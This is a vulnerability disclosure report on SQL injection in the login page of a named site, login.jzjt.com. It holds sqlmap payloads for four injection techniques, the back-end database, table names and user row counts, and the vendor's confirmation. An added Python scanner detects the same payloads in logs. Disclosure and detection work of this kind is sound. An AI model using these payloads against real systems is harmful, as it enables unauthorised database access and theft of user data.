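2015-07-13: Details reported to the vendor; awaiting vendor response
2015-07-14: Vendor confirmed; details disclosed to the vendor only
2015-07-24: Details disclosed to core white hats and experts in related fields
2015-08-03: Details disclosed to regular white hats
2015-08-13: Details disclosed to trainee white hats
2015-08-28: Details disclosed to the public
SQL injection
At http://login.jzjt.com/login.jsp, enter ' as the username
Capture the request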
http://login.jzjt.com/login.jsp?R1.x=25&R1.y=25&passwd=a&refer=%2Femail.jsp&userid=a*
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: http://login.jzjt.com:80/login.jsp?R1.x=35&R1.y=52&passwd=a&refer=email.jsp&userid=a' AND 9942=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(121)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (9942=9942) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(110)+CHAR(121)+CHAR(113))) AND 'Lvht'='Lvht

    Type: UNION query
    Title: Generic UNION query (NULL) - 23 columns
    Payload: http://login.jzjt.com:80/login.jsp?R1.x=35&R1.y=52&passwd=a&refer=email.jsp&userid=a' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(121)+CHAR(106)+CHAR(113)+CHAR(78)+CHAR(115)+CHAR(71)+CHAR(108)+CHAR(72)+CHAR(77)+CHAR(85)+CHAR(102)+CHAR(89)+CHAR(87)+CHAR(113)+CHAR(106)+CHAR(110)+CHAR(121)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: http://login.jzjt.com:80/login.jsp?R1.x=35&R1.y=52&passwd=a&refer=email.jsp&userid=a'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: http://login.jzjt.com:80/login.jsp?R1.x=35&R1.y=52&passwd=a&refer=email.jsp&userid=a' WAITFOR DELAY '0:0:5'--
---
[17:12:39] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
Current database
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
[17:13:10] [INFO] fetching current database
current database: 'JzWeb'
Injection point
Databases
available databases [10]:
[*] JzWeb
[*] lumigent
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] YC_SmartCard
[*] ysbx_zj
current database: 'JzWeb'
Tables
Database: JzWeb
[277 tables]
Some of the tables
| temp_usr |
| tmp_usr |
| usr1 |
| usr_dep |
| usr_dep |
| usr_func |
| usr_inf |
| usr_level |
| usr_mail_info |
| usr_roll |
| usr_std_level |
| usr_table |
| v_afr_log |
| v_cgdetail |
| vaframt |
| vendor_data |
| wjdc_jsp |
| wlb_audit |
| wldc2013 |
| wldc2013 |
| workflow |
| xjlZB |
| xjllb_qm |
| xjllb_qm |
| xjllb_qm |
select count(*) from acount;: '138'
select count(*) from usr1;: '930'
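Added example (not part of the original report and not the vendor's code): the Python below flags, in web access logs, the initial single-quote probe and the four techniques sqlmap reported against the userid parameter of login.jsp. The log format, client addresses and log lines are constructed, and the regular expressions are assumptions modelled on the T-SQL payload shapes shown in the report.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# One signature per technique in the sqlmap output above, plus the quote probe.
SIGNATURES = {
    "error-based": re.compile(r"CONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT", re.I),
    "union": re.compile(r"UNION\s+ALL\s+SELECT\s+(NULL|CHAR\()", re.I),
    "stacked": re.compile(r";\s*WAITFOR\s+DELAY", re.I),
    "time-based": re.compile(r"WAITFOR\s+DELAY\s+'\d+:\d+:\d+'", re.I),
    "quote": re.compile(r"'"),
}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def classify(value):
    """Return the sorted signature names matching one decoded parameter value."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(value))

def scan(log_text, param="userid"):
    """Return (client, status, hits) for each request whose `param` looks injected."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        # parse_qsl percent-decodes; every occurrence of the parameter is checked
        pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
        hits = sorted({h for k, v in pairs if k == param for h in classify(v)})
        if hits:
            findings.append((client, int(status), hits))
    return findings

# Constructed access-log lines; client addresses use a documentation range.
_FMT = ('192.0.2.{} - - [13/Jul/2015:17:12:39 +0800] '
        '"GET /login.jsp?passwd=a&refer=email.jsp&userid={} HTTP/1.1" {} 512')
SAMPLE_LOG = "\n".join(_FMT.format(*row) for row in [
    (10, "alice", 200),
    (66, "%27", 500),
    (66, "a%27%20AND%209942%3DCONVERT(INT%2C(SELECT%20CHAR(113)))", 500),
    (66, "a%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--", 200),
    (66, "a%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27--", 200),
    (66, "a%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27--", 200),
])

if __name__ == "__main__":
    for client, status, hits in scan(SAMPLE_LOG):
        print(client, status, ",".join(hits))
```

Matching runs on the decoded value, so percent-encoded payloads are caught as well; a hit on any signature other than the bare quote is a strong indicator on a login field.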
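Severity: Low
Vulnerability Rank: 5
Confirmed: 2015-07-14 14:11
Thank you very much for discovering the vulnerability. Our company's information staff are handling it.
None yet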